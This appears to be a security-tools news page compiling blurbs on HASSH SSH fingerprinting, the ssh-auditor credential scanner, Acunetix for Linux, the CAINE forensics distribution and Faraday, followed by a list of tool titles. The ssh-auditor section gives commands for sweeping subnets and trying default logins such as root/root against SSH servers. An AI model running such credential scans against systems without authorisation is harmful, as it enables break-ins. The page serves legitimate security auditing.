"hassh" and "hasshServer" are MD5 hashes constructed from a specific set of algorithms that are supported by various SSH Client and Server Applications. These algorithms are exchanged after the initial TCP three-way handshake as clear-text packets known as "SSH_MSG_KEXINIT" messages, and are an integral part of the setup of the final encrypted SSH channel. The existence and ordering of these algorithms is unique enough such that it can be used as a fingerprint to help identify the underlying Client and Server application or unique implementation, regardless of higher level ostensible identifiers such as "Client" or "Server" strings.

References:

Credits:
hassh and hasshServer were conceived and developed by Ben Reardon (@benreardon) within the Detection Cloud Team at Salesforce, with inspiration and contributions from Adel Karimi (@0x4d31) and the JA3 crew crew:John B. Althouse , Jeff Atkinson and Josh Atkins

Download Hassh

The Best Way To Scan For Weak Ssh Passwords On Your Network

Features
ssh-auditor will automatically:

Re-check all known hosts as new credentials are added. It will only check the new credentials.
Queue a full credential scan on any new host discovered.
Queue a full credential scan on any known host whose ssh version or key fingerprint changes.
Attempt command execution as well as attempt to tunnel a TCP connection.
Re-check each credential using a per credential scan_interval - default 14 days.

It's designed so that you can run ssh-auditor discover + ssh-auditor scan from cron every hour to to perform a constant audit.

Demos

Earlier demo showing all of the features

Demo showing improved log output

Usage

Install

$ brew install go # or however you want to install the go compiler
$ go get github.com/ncsa/ssh-auditor

or Build from a git clone

$ go build

Build a static binary including sqlite

$ make static

Ensure you can use enough file descriptors

$ ulimit -n 4096

Create initial database and discover ssh servers

$ ./ssh-auditor discover -p 22 -p 2222 192.168.1.0/24 10.0.0.1/24

Add credential pairs to check

$ ./ssh-auditor addcredential root root
$ ./ssh-auditor addcredential admin admin
$ ./ssh-auditor addcredential guest guest --scan-interval 1 #check this once per day

Try credentials against discovered hosts in a batch of 20000

$ ./ssh-auditor scan

Output a report on what credentials worked

$ ./ssh-auditor vuln

RE-Check credentials that worked

$ ./ssh-auditor rescan

Output a report on duplicate key usage

$ ./ssh-auditor dupes

Report query.
This query that ssh-auditor vuln runs is

select
        hc.hostport, hc.user, hc.password, hc.result, hc.last_tested, h.version
 from
        host_creds hc, hosts h
 where
        h.hostport = hc.hostport
 and    result!='' order by last_tested asc

Download Ssh-Auditor

Acunetix, the pioneer in automated web application security software, has announced the release of Acunetix for Linux. Known to be reliable, cost-effective and secure, Linux is the server operating system of choice for many large organizations including Facebook, Twitter, and Google. Acunetix is one of the first commercial, automated web vulnerability scanners to be released for Linux.

“Following extensive customer research, it became clear to us that a number of customers and security community professionals preferred to run on Linux. Tech professionals have long chosen Linux for their servers and computers due to its robust security. However, in recent years, this open source operating system has become much more user-friendly. We are very proud to be one of the first commercial web vulnerability scanners to be released for Linux.”
Nicholas Sciberras, CTO

Acunetix is able to comprehensively and accurately scan all types of web applications, including those that rely heavily on JavaScript, such as SPAs (Single Page Applications. Version 12 launched in May this year and ships with a brand new, re-engineered and rewritten scanning engine, making Acunetix the fastest scanning engine in the industry. Previously only available on Windows and Online, it is now also available on Linux.

Benefits of Running Acunetix on Linux OS

Reliability and security: Linux is the operating system most often selected for servers that need close to 100% uptime. Using Linux increases the reliability needed for the thousands of operations required to scan a website.
Cost-effectiveness: Acunetix customers can run the scanner in their own private cloud on either Amazon AWS, Digital Ocean or Google Cloud, for example.
Performance: Linux requires fewer resources to run, resulting in extra resources to increase scanner performance.

Download Acunetix Vulnerability Scanner

CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project. Currently, the project manager is Nanni Bassetti (Bari - Italy).

CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface.

The main design objectives that CAINE aims to guarantee are the following:

an interoperable environment that supports the digital investigator during the four phases of the digital investigation
a user-friendly graphical interface
user-friendly tools

CAINE represents fully the spirit of the Open Source philosophy because the project is completely open, everyone could take on the legacy of the previous developer or project manager. The distro is open source, the Windows side is freeware and, the last but not least, the distro is installable, thus giving the opportunity to rebuild it in a new brand version, so giving a long life to this project...

CHANGELOG CAINE 10.0 "Infinity"

Kernel 4.15.0-38
Based on Ubuntu 18.04 64BIT - UEFI/SECURE BOOT Ready!
CAINE 10.0 can boot on Uefi/Uefi+secure boot/Legacy Bios/Bios.

The important news is CAINE 10.0 blocks all the block devices (e.g. /dev/sda), in Read-Only mode. You can use a tool with a GUI named BlockON/OFF present on CAINE's Desktop.
This new write-blocking method assures all disks are really preserved from accidentally writing operations because they are locked in Read-Only mode.
If you need to write a disk, you can unlock it with BlockOn/Off or using "Mounter" changing the policy in writable mode.

Read more here.

Download CAINE 10.0

Here’s the main new features and improvements in Faraday v3.3:

Workspace archive

You are now able to make the whole workspace read only and archive it for future use. This allows to clear the clutter from all your ongoing projects while giving you the opportunity to continue with your work later on if needed.

Host tags
Hosts can now be tagged. With this new feature you can now easily identify production, testing or development hosts.

Zap plugin

Do you like using Faraday with Burp? What about sending issues from Burp to Faraday? Now you can do the same with OWASP ZAP!

In this release of Faraday we are including an addon for OWASP ZAP. Now you can send any alert or request found by ZAP into a Faraday Workspace. This is an extension to our collection of more than 70 plugins and integrations with security tools, to help you save time on your daily work.

Add vendor name to host

We added hosts vendor to host list. This feature will show you the vendor when the mac address is set.

Download Faraday v3.3

DjangoHunter - Tool Designed To Help Identify Incorrectly Configured Django Applications That Are Exposing Sensitive Information

Novahot - A Webshell Framework For Penetration Testers

Hackertarget - Tools And Network Intelligence To Help Organizations With Attack Surface Discovery

Dirhunt v0.6.0 - Find Web Directories Without Bruteforce

WebMap - Nmap Web Dashboard And Reporting

AutoRDPwn v4.5 - The Shadow Attack Framework

Arjun v1.1 - HTTP Parameter Discovery Suite

Androspy - Backdoor Crypter & Creator With Automatic IP Poisener

Manticore - Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts

BabySploit - BabySplot Beginner Pentesting Framework

Osmedeus - Automatic Reconnaisance And Scanning In Penetration Testing

DeepSearch - Advanced Web Dir Scanner

CloudBunny - A Tool To Capture The Real IP Of The Server That Uses A WAF As A Proxy Or Protection

Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)

Pacu - The AWS Exploitation Framework, Designed For Testing The Security Of Amazon Web Services Environments

HASSH - A Network Fingerprinting Standard Which Can Be Used To Identify Specific Client And Server SSH Implementations

SSH Auditor - The Best Way To Scan For Weak Ssh Passwords On Your Network

Acunetix Vulnerability Scanner Version For Linux

CAINE 10.0 - GNU/Linux Live Distribution For Digital Forensics Project, Windows Side Forensics And Incident Response

Faraday v3.3 - Collaborative Penetration Test and Vulnerability Management Platform